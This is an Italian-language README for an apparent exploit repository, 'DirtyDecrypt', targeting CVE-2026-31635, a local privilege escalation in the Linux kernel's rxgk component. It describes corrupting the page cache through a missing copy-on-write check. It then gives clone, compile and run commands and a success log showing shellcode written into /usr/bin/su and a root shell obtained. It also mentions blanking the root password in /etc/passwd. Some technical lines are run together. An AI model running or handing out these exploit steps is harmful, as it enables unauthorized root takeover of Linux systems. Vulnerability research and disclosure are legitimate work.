
CVE-2026-31635
Escalation dei Privilegi Locali nel Kernel Linux tramite Corruzione della Cache di Pagine RXGK
DirtyDecrypt (CVE-2026-31635) è una vulnerabilità di escalation dei privilegi locali nel sottosistema rxrpc del kernel Linux (nello specifico il componente rxgk).
Abusa di una mancanza del controllo Copy-on-Write (COW) durante la decifratura AES-CBC, consentendo a un utente non privilegiato di corrompere la cache di pagine e ottenere scritture arbitrarie su file, portando all'accesso root.
/etc/passwd (password root vuota)CONFIG_RXGK=y)CONFIG_RXGK=nCONFIG_RXGK abilitatoAF_RXRPCkeyctl (per chiavi rxrpc)git clone https://github.com/0xBlackash/DirtyDecrypt.git
cd DirtyDecrypt
gcc -O2 -static -pthread CVE-2026-31635.c -o DirtyDecrypt
./DirtyDecrypt
Output di successo previsto:
=== rxgk pagecache write (DirtyDecrypt) ===
uid=1000 euid=1000
[*] scrittura shellcode in /usr/bin/su (96 byte dall'offset 0)
[========================================] 100% (XXX/96, YYYY scatenamenti)
[*] XXX scatenamenti in Z.Zs
[*] exec /usr/bin/su
[*] ripristino: cp /tmp/.su_12345 /usr/bin/su
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
#
DirtyDecrypt/
├── CVE-2026-31635.c # Exploit principale
├── README.md # Questo file
├── Makefile # Opzionale
└── exploit.log # Log di output opzionale
AF_RXRPC + splice() per forzare pagine della cache di pagine nel percorso di decifratura RXGKskb_cow_data()/etc/passwd) byte per byte usando la tecnica della finestra scorrevoleQuesto exploit è solo per scopi educativi e test di sicurezza autorizzati.
L'uso non autorizzato su sistemi di cui non si è proprietari è illegale.
⭐ Metti una stella a questo repo se ti è stato utile!
Fatto con ❤️ per la comunità di ricerca